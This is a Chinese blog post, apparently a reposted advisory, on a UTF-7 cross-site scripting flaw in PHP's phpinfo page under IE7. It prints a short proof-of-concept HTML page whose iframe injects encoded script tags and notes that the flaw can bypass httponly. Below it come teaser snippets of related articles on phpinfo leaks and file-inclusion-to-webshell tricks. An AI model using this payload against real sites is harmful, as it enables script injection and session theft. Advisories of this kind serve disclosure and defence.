phpinfo跨站脚本漏洞

最新推荐文章于 2024-05-14 03:37:45 发布
最新推荐文章于 2024-05-14 03:37:45 发布
阅读量1.2k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: ‖漏 洞 公 布‖ 文章标签: 脚本 iframe 浏览器 ie php html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hackiis/article/details/2914209
本文介绍了一个存在于 PHPInfo 页面的跨站脚本 (XSS) 漏洞,该漏洞允许攻击者绕过过滤机制并在目标浏览器中执行恶意脚本。详细解释了漏洞产生的原因,并给出了在 IE7 和 PHP 5.2.6 下测试成功的利用代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 洞成因: phpinfo页面对输入的参数都做了详细的过滤,但是没有对输出的进行charset的指定,而在一些浏览器里如IE7里,你可以让它自动选择编码或者通过一个iframe页面给它指定编码,这样就可以饶过phpinfo的过滤而产生一个跨站脚本漏洞。

漏洞来源: http://www.80sec.com/release/phpinfo-xss.txt

漏洞利用: 利用代码如下:

<html>
<head>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</head>
<body>
<iframe src="http://www.80sec.com/phpinfo.php?+ADw-SCRIPT+AD4-alert(document.domain);+ADw-/SCRIPT+AD4-=1">

以上代码在IE7+php 5.2.6测试成功。phpinfo页面的xss甚至比其他页面更加危险,因为如果有phpinfo的存在,恶意攻击者可以利用phpinfo的输出bypass如httponly和一些基础认证。

漏洞影响: 影响所有版本的php和浏览器IE7
漏洞修补: 建议暂时删除站点的phpinfo页面避免被人利用。
漏洞挖掘】——55、 PHPINFO信息泄露检测与利用
Fly_鹏程万里
10-20 4303
PHPINFO信息泄露是指通过访问Web服务器上的PHPINFO页面获取关于PHP配置和服务器环境的敏感信息的攻击行为,PHPINFO页面是一种特殊的PHP脚本,它可以列出PHP解释器的配置信息和环境变量等详细信息,攻击者可以通过访问PHPINFO页面获取服务器的敏感信息,比如:PHP版本号、模块版本、文件路径、安装路径、操作系统版本等,这些信息可以被攻击者用于实施其他攻击行为,比如:利用已知的漏洞进行攻击或者编写定制的攻击脚本
phpinfo漏洞信息利用
墨痕诉清风的博客
10-10 7866
libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理,会导致XXE。向phpinfo()页面post一个shell(自己写一个上传页面),可以在_FILES[“file1”]中看到上传的临时文件,如果有个lfi,便可以直接getshell了。php标签有4种形式,如果这个选项不开启的话(一般默认不开启),使用asp的标签是不会解析的。还是标签的问题,允许这种形式,并且
TOP10漏洞之文件包含
weixin_44255856的博客
12-09 1273
前沿 很早之前就学习了top10的漏洞,但是对于我自己来说基本上就大体的过来一遍,有一句话就是学习好基础,让你少奋斗两年, 于是我现在又来过一遍top10漏洞。在这些中主要侧重于我自己的思路。 ##文件包含含义: 文件包含在我的理解来说就是程序员在自己写代码是要调用其他的文件,使用包含文件的函数。在我们耳中关于文件包含漏洞的存在基本在php,但是在jsp, asp中同样也存在文件包含。 于是在这篇...
PHP文件包含漏洞利用phpinfo
Li-D的博客
12-31 8945
漏洞描述 文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 PHP中引发文件包含漏洞的通常是以下四个函数: 1、include()当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、include_once()功能和include()相同,区别在于当重复调用同一文件时,程序只调用一次。 3、require()只要程序一执行就
PHP文件包含漏洞(利用phpinfo)复现&&文件上传(条件竞争)
sinat_61654365的博客
01-11 3339
PHP 环境下,如果网站存在本地文件包含漏洞,但是却无法找到想要包含的文件,也无法生成和上传文件,是否能够获得 WebShell 呢?这有一个技巧,前提是网站需要有一个 phpinf 页面,就可以通过条件竞争来包含缓存文件获取 WebShell了。这个技巧实际上融合了PHIP 文件包含信息泄露条件竞争这三种漏洞,下面简述一下这种技巧的原理。
《CTF特训营》——跨站脚本攻击(XSS)
PICACHU+++的博客
07-15 2493
跨站脚本攻击简称XSS,是一种网站应用程序漏洞,是代码注入漏洞的一种,攻击者可以通过这个漏洞向网页中注入恶意代码,导致用户浏览器加载网页、渲染HTML文档时执行攻击者代码。反射型XSS,存储型XSS,DOM型XSS输出在HTML属性中,输出在CSS代码中,输出在JavaScript中.......................................
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
**XSS跨站脚本攻击详解** XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取Cookie、操纵页面内容,甚至进行更复杂的攻击。...
自动化PHPInfo页面漏洞扫描工具
3. **漏洞识别**:通过自动化扫描,该工具能够识别出phpinfo页面中潜在的安全漏洞。识别漏洞是网络安全工作中的关键步骤,它能够帮助开发者和安全专家及时发现并修补系统漏洞,防止安全事件发生。 4. **技术栈**:...
PHPInfo()信息泄漏漏洞利用及提权
热门推荐
weixin_44023460的博客
12-08 3万+
Simeon PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 1.1phpinfo函数 PHP中提供了PHPInfo()函数,该函数返...
vulhub PHP文件包含漏洞(利用phpinfo)复现
weixin_53696027的博客
03-04 1069
通过docker搭建vulhub靶场来利用php文件包含漏洞
信息泄露(目录遍历,phpinfo,备份文件下载)_phpinfo信息泄露漏洞(1)
最新发布
2401_84972844的博客
05-14 1222
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
phpinfo.php ctf,这你不是你所常见的PHP文件包含漏洞利用phpinfo
weixin_29352517的博客
03-10 1024
0x01 前言看到文件包含(+phpinfo ) 的问题,在上次众测中出现此题目,如果没打过CTF,可能真的很少见到这种问题,当然作为小白的我,也是很少遇到,毕竟都是第一次,那就来总结一波经验和操作,附赠EXP,借鉴网上大佬环境,进一步进行探索。0x02 漏洞环境执行如下命令启动环境:docker-compose up -d目标环境是官方最新版PHP7.2,说明该漏洞PHP版本无关。环境启动后,...
php通用漏洞phpinfo,php文件包含漏洞利用phpinfo)复现
weixin_39574555的博客
03-11 550
利用docker复现该漏洞,访问http://192.168.80.156:8080/phpinfo.php,可以看到页面出现phpinfo页面再访问http://192.168.80.156:8080/lfi.php?file=/etc/passwd,可以看到该页面是存在文件包含漏洞的。先讲一下利用phpinfo上传文件,然后在文件包含的原理:参考链接:https://github.com/vu...
浅谈“phpinfo()信息泄漏”
→_→
06-29 1万+
一:漏洞名称: PHPInfo信息泄漏、phpinfo()函数信息泄漏 描述: PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 phpinfo()函数返回的信息中包含了服务器的配置信息,包括: 1)PHP编译选项以及文件扩展名
PHP phpinfo.php 信息泄露
(ง •_•)ง
11-25 2517
phpinfo可能会泄露项目php版本和服务器变量等信息,安全起见我们需要禁用phpinfo函数,那我们该如何禁用phpinfo函数呢?首先打开php.ini,找到“disable_functions”,没有则新增,修改成以下: disable_functions =phpinfo disable_functions是禁用php函数,多个函数英文逗号分隔禁用: disable_functions...
PHP文件包含漏洞(利用phpinfo)复现
m0_52701599的博客
03-05 1741
PHP文件包含漏洞(利用phpinfo)复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值